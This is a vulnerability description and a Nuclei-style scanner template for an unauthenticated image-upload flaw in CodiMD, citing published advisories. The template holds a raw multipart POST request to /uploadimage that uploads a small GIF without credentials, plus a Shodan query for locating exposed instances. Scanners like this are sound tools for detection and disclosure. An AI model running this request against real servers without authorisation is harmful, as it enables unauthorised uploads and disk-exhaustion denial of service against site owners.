CodiMD does not require valid authentication to access uploaded images or to upload new image data. An attacker who can determine an uploaded image's URL can gain unauthorised access to uploaded image data, or can create a denial of service condition by exhausting all available disk space.
PoC代码[已公开]
id: codimd-unauth-file-upload
info:
name: CodiMD - File Upload
author: denandz,PulseSecurity.co.nz
severity: medium
description: |
CodiMD does not require valid authentication to access uploaded images or to upload new image data. An attacker who can determine an uploaded image's URL can gain unauthorised access to uploaded image data, or can create a denial of service condition by exhausting all available disk space.
reference:
- https://github.com/hackmdio/codimd/security/advisories/GHSA-2764-jppc-p2hm
- https://pulsesecurity.co.nz/advisories/codimd-missing-image-access-controls
metadata:
max-request: 1
verified: true
shodan-query: html:"CodiMD"
tags: file-upload,intrusive,codimd
http:
- raw:
- |
POST /uploadimage HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161
-----------------------------92633278134516118923780781161
Content-Disposition: form-data; name="image"; filename="{{randstr}}.gif"
Content-Type: image/gif
{{base64_decode("R0lGODlhAQABAIABAP///wAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==")}}
-----------------------------92633278134516118923780781161--
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '"link":".*?.gif"'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"link":"(.*)"'
# digest: 4a0a00473045022100ef428961687368873537e6000fdd68686cadc910b6becdbba641b4d26a532d4102202e2b8c020d96ee350519c007eeeceb62b43ca94390f272611b8671b254a05642:922c64590222798bb761d5b6d8e72950